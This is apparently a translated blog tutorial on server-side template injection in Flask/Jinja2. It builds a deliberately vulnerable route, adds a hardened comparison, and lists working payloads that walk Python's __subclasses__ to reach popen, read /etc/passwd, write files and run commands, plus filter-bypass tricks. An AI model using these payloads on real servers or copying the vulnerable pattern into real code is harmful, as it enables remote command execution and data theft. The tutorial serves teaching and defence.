A first look at SSTI

SSTI (server-side template injection) arises when the server takes user input and uses it as part of the template source that it then compiles and renders. An attacker can therefore insert template syntax, and the template engine executes it, leading to a variety of problems, up to command execution as shown below.

First, let's write a simple Flask app (SSTI discussions usually centre on the Flask framework). I use PyCharm, so the project can be created there directly.
The code of app.py is as follows:

from flask import Flask  # Flask has to be installed separately
from flask import render_template
from flask import request

app = Flask(__name__)


@app.route('/',methods=['GET','POST'])
def hello_world():
    return render_template("index.html", title='Home', user=request.args.get("key"))


if __name__ == '__main__':
    app.run()

Create the folder layout so that index.html sits in a templates folder next to app.py (Flask looks for the files it renders in templates). Write index.html as follows:

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>This is a test</title>
</head>
<body>
<h1>hello.{{ user }}</h1>
</body>
</html>

Run app.py and open 127.0.0.1:5000 with the parameter key={{2*3}}. The page shows the literal text {{2*3}}: nothing is evaluated, because the template was already rendered from a fixed file and the user value only fills a variable, so the user cannot control the template itself. But if in app.py we take

def hello_world():
    return render_template("index.html", title='Home', user=request.args.get("key"))

and replace it with

from flask import render_template_string  # also needed at the top of app.py

@app.route('/', methods=['GET', 'POST'])
def hello_world():
    code = request.args.get('id')
    # the user value is spliced straight into the template source (this is the bug)
    template = '''
        <div class="center-content error">
            <h1>Oops! That page doesn't exist.</h1>
            <h3>%s</h3>
        </div>
    ''' % (code)
    return render_template_string(template)

Now the problem is serious: the contents of the variable are spliced into the template as a string, so they become part of the template source. Requesting /?id={{2*3}} now shows 6: the expression in id was evaluated directly, so we can inject into the template.
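As an added example (not code from the original post), here is the vulnerable route above placed beside a hardened version and exercised with Flask's test client. Flask is assumed to be installed; the route paths, template constants and probe values are constructed for the example. The fix is simply to keep the template source constant and hand the user value to Jinja2 as a context variable.

```python
# Added example (not from the original post): the vulnerable route beside a
# hardened one, exercised with Flask's test client. Assumes Flask is installed;
# route paths, template constants and probe values are constructed here.
from flask import Flask, request, render_template_string

app = Flask(__name__)

# Same page as in the post: the user value is %-formatted into the source.
ERROR_PAGE_VULNERABLE = '''
    <div class="center-content error">
        <h1>Oops! That page doesn't exist.</h1>
        <h3>%s</h3>
    </div>
'''

# Hardened page: the user value is a Jinja2 variable resolved at render time.
ERROR_PAGE_SAFE = '''
    <div class="center-content error">
        <h1>Oops! That page doesn't exist.</h1>
        <h3>{{ code }}</h3>
    </div>
'''


@app.route('/vulnerable')
def vulnerable():
    # BUG (as in the post): user input becomes part of the template *source*,
    # so Jinja2 evaluates any {{ ... }} or {% ... %} the client sends.
    code = request.args.get('id', '')
    return render_template_string(ERROR_PAGE_VULNERABLE % code)


@app.route('/safe')
def safe():
    # FIX: the template source is a constant; the user value is passed as a
    # context variable, so it is rendered as text. Flask enables autoescaping
    # for render_template_string, so HTML in the value is escaped as well.
    code = request.args.get('id', '')
    return render_template_string(ERROR_PAGE_SAFE, code=code)


def render_vulnerable(payload):
    """Body the vulnerable route produces for ?id=<payload>."""
    client = app.test_client()
    return client.get('/vulnerable', query_string={'id': payload}).get_data(as_text=True)


def render_safe(payload):
    """Body the hardened route produces for ?id=<payload>."""
    client = app.test_client()
    return client.get('/safe', query_string={'id': payload}).get_data(as_text=True)


if __name__ == '__main__':
    probe = '{{ 7 * 7 }}'
    print('vulnerable ->', render_vulnerable(probe).strip())  # the <h3> contains 49
    print('safe       ->', render_safe(probe).strip())        # the <h3> contains the literal probe
```

Running it shows `{{ 7 * 7 }}` coming back as `49` from /vulnerable and unchanged from /safe, and a value such as `<b>x</b>` comes back HTML-escaped from /safe. Note that `render_template_string` still parses a template on every request; in real code the constant belongs in a file under templates/, but the point demonstrated here is only that user data must never become part of the template source.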
Here we need to know some special Python attributes:

__class__         # returns the type of the object it is called on
__base__          # returns the base class
__mro__           # lets us walk the inheritance tree in the running Python environment
__subclasses__()  # returns the subclasses

Most Flask SSTI PoCs come down to finding a usable class by starting from the object class (object is the base class of every class). The simplest payload, "".__class__.__bases__[0].__subclasses__()[133].__init__.__globals__['popen']('dir').read(), takes the 134th subclass of object (here the os._wrap_close class), reaches its __init__ function and, through that function's global variables, gets to popen to execute a command. Note that the index 133 is specific to the author's environment: the order and number of entries returned by __subclasses__() differ between Python versions and depend on which modules are loaded.

"".__class__ returns <class 'str'>
"".__class__.__bases__ returns (<class 'object'>,)
"".__class__.__bases__[0].__subclasses__() returns all subclasses of object
"".__class__.__bases__[0].__subclasses__()[133] is <class 'os._wrap_close'>
__init__ is the class's initializer (here used simply as a function object)
__globals__ is the function's global namespace, i.e. all global variables, modules and functions it can see
__globals__['popen'] looks popen up in that namespace so it can be called

Here are some payloads:
Read / write a file:

[].__class__.__bases__[0].__subclasses__()[40]('/etc/passwd').read()
''.__class__.__bases__[0].__subclasses__()[40]('/var/www/html').write('test')

Command execution (the first one relies on func_globals, which exists only in Python 2; in Python 3 the attribute is __globals__):

"".__class__.__bases__[0].__subclasses__()[59].__init__.func_globals.linecache.os.popen('whoami').read()
"".__class__.__bases__[0].__subclasses__()[59].__init__.__globals__['__builtins__']['eval']("__import__('os').popen('whoami').read()")
"".__class__.__bases__[0].__subclasses__()[133].__init__.__globals__['popen']('whoami').read()

There are also some bypass tips:

  1. Keyword filtering: split the keyword and splice the pieces back together, e.g. if globals is filtered, use 'glo'+'bals'.
  2. Filtered brackets: use __getitem__ instead, so the original ''.__class__.__mro__[2] can be replaced by ''.__class__.__mro__.__getitem__(2).
  3. Filtered {{ }}: use the {% %} block syntax instead.

For more tips and payloads, see p牛's write-up: https://p0sec.net/index.php/archives/120/

Reference articles:
https://xz.aliyun.com/t/3679
https://www.cnblogs.com/hackxf/p/10480071.html


Source: blog.csdn.net/weixin_44377940/article/details/105052251